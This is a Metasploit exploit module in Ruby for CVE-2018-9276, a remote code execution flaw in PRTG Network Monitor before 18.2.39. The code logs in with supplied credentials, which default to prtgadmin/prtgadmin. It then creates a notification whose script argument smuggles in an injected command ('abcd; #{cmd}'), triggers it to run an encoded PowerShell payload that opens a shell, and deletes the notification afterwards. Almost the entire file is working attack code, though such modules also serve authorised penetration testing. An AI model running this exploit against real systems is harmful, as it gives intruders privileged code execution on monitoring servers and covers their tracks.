modules/exploits/windows/http/prtg_authenticated_rce.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info = {})
super(
update_info(
info,
'Name' => 'PRTG Network Monitor Authenticated RCE',
'Description' => %q{
Notifications can be created by an authenticated user and can execute scripts when triggered.
Due to a poorly validated input on the script name, it is possible to chain it with a user-supplied command allowing command execution under the context of privileged user.
The module uses provided credentials to log in to the web interface, then creates and triggers a malicious notification to perform RCE using a Powershell payload.
It may require a few tries to get a shell because notifications are queued up on the server.
This vulnerability affects versions prior to 18.2.39. See references for more details about the vulnerability allowing RCE.
},
'License' => MSF_LICENSE,
'Author' => [
'Josh Berry <josh.berry[at]codewatch.org>', # original discovery
'Julien Bedel <contact[at]julienbedel.com>', # module writer
],
'References' => [
['CVE', '2018-9276'],
['URL', 'https://www.codewatch.org/blog/?p=453']
],
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' => [
['Automatic Targeting', { 'auto' => true }]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'WfsDelay' => 30 # because notification triggers are queuded up on the server
},
'DisclosureDate' => '2018-06-25',
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ SCREEN_EFFECTS, CONFIG_CHANGES, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)
register_options(
[
OptString.new('ADMIN_USERNAME', [true, 'The username to authenticate as', 'prtgadmin']),
OptString.new('ADMIN_PASSWORD', [true, 'The password for the specified username', 'prtgadmin'])
]
)
end
def prtg_connect
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(datastore['URI'], 'public', 'checklogin.htm'),
'vars_post' => {
'loginurl' => '',
'username' => datastore['ADMIN_USERNAME'],
'password' => datastore['ADMIN_PASSWORD']
}
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
fail_with(Failure::Unreachable, 'Failed to reach remote host')
ensure
disconnect
end
if res && res.code == 302 && res.headers['LOCATION'] == '/home' && res.get_cookies
@cookies = res.get_cookies.to_s
print_good('Successfully logged in with provided credentials')
vprint_status("Session cookies : #{@cookies}")
else
fail_with(Failure::NoAccess, 'Failed to authenticate to the web interface')
end
end
def prtg_create_notification(cmd)
uri = datastore['URI']
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'editsettings'),
'cookie' => @cookies,
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'vars_post' => {
'name_' => Rex::Text.rand_text_alphanumeric(4..24),
'active_' => '1',
'schedule_' => '-1|None|',
'postpone_' => '1',
'summode_' => '2',
'summarysubject_' => '[%sitename] %summarycount Summarized Notifications',
'summinutes_' => '1',
'accessrights_' => '1',
'accessrights_201' => '0',
'active_1' => '0',
'addressuserid_1' => '-1',
'addressgroupid_1' => '-1',
'subject_1' => '[%sitename] %device %name %status %down (%message)',
'contenttype_1' => 'text/html',
'priority_1' => '0',
'active_17' => '0',
'addressuserid_17' => '-1',
'addressgroupid_17' => '-1',
'message_17' => '[%sitename] %device %name %status %down (%message)',
'active_8' => '0',
'addressuserid_8' => '-1',
'addressgroupid_8' => '-1',
'message_8' => '[%sitename] %device %name %status %down (%message)',
'active_2' => '0',
'eventlogfile_2' => 'application',
'sender_2' => 'PRTG Network Monitor',
'eventtype_2' => 'error',
'message_2' => '[%sitename] %device %name %status %down (%message)',
'active_13' => '0',
'syslogport_13' => '514',
'syslogfacility_13' => '1',
'syslogencoding_13' => '1',
'message_13' => '[%sitename] %device %name %status %down (%message)',
'active_14' => '0',
'snmpport_14' => '162',
'snmptrapspec_14' => '0',
'messageid_14' => '0',
'message_14' => '[%sitename] %device %name %status %down (%message)',
'active_9' => '0',
'urlsniselect_9' => '0',
'active_10' => '10',
'address_10' => 'Demo EXE Notification - OutFile.ps1',
'message_10' => "abcd; #{cmd}",
'timeout_10' => '60',
'active_15' => '0',
'message_15' => '[%sitename] %device %name %status %down (%message)',
'active_16' => '0',
'isusergroup_16' => '1',
'addressgroupid_16' => '200|PRTG Administrators',
'ticketuserid_16' => '100|PRTG System Administrator',
'subject_16' => '%device %name %status %down (%message)',
'message_16' => 'Sensor: %name\r\nStatus: %status %down\r\n\r\nDate/Time: %datetime (%timezone)\r\nLast Result: %lastvalue\r\nLast Message: %message\r\n\r\nProbe: %probe\r\nGroup: %group\r\nDevice: %device (%host)\r\n\r\nLast Scan: %lastcheck\r\nLast Up: %lastup\r\nLast Down: %lastdown\r\nUptime: %uptime\r\nDowntime: %downtime\r\nCumulated since: %cumsince\r\nLocation: %location\r\n\r\n',
'autoclose_16' => '1',
'objecttype' => 'notification',
'id' => 'new',
'targeturl' => '/myaccount.htm?tabid=2'
}
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
fail_with(Failure::Unreachable, 'Failed to reach remote host')
ensure
disconnect
end
if res && res.code == 200 && res.get_json_document['objid'] && !res.get_json_document['objid'].empty?
@objid = res.get_json_document['objid']
print_good("Created malicious notification (objid=#{@objid})")
vprint_status("Payload : #{cmd}")
else
fail_with(Failure::Unknown, 'Failed to create malicious notification')
end
end
def prtg_trigger_notification
uri = datastore['URI']
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'api', 'notificationtest.htm'),
'cookie' => @cookies,
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'vars_post' => {
'id' => @objid
}
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
fail_with(Failure::Unreachable, 'Failed to reach remote host')
ensure
disconnect
end
if res && res.code == 200 && (res.to_s.include? 'EXE notification is queued up')
print_good('Triggered malicious notification')
else
fail_with(Failure::Unknown, 'Failed to trigger malicious notification')
end
end
def prtg_delete_notification
uri = datastore['URI']
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'api', 'deleteobject.htm'),
'cookie' => @cookies,
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'vars_post' => {
'id' => @objid,
'approve' => '1'
}
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
fail_with(Failure::Unreachable, 'Failed to reach remote host')
ensure
disconnect
end
if res
print_good('Deleted malicious notification')
else
fail_with(Failure::Unknown, 'Failed to delete malicious notification')
end
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['URI'], '/index.htm')
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
return CheckCode::Unknown
ensure
disconnect
end
if res && res.code == 200
# checks for PRTG version in http headers first, if not found looks for it in html
version_match = /\d{1,2}\.\d{1}\.\d{1,2}\.\d*/
prtg_server_header = res.headers['Server']
if prtg_server_header && prtg_server_header =~ version_match
prtg_version = prtg_server_header[version_match]
else
html = res.get_html_document
prtg_version_html = html.at('span[@class="prtgversion"]')
if prtg_version_html && prtg_version_html.text =~ version_match
prtg_version = prtg_version_html.text[version_match]
end
end
if prtg_version
vprint_status("Identified PRTG Network Monitor Version #{prtg_version}")
if Rex::Version.new(prtg_version) < Rex::Version.new('18.2.39')
return CheckCode::Appears
else
return CheckCode::Safe
end
elsif (prtg_server_header.include? 'PRTG') || (html.to_s.include? 'PRTG')
return CheckCode::Detected
end
end
return CheckCode::Unknown
end
def exploit
powershell_options = {
# method: 'direct',
remove_comspec: true,
wrap_double_quotes: true,
encode_final_payload: true
}
ps_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
prtg_connect
prtg_create_notification(ps_payload)
prtg_trigger_notification
prtg_delete_notification
print_status("Waiting for payload execution.. (#{datastore['WfsDelay']} sec. max)")
end
end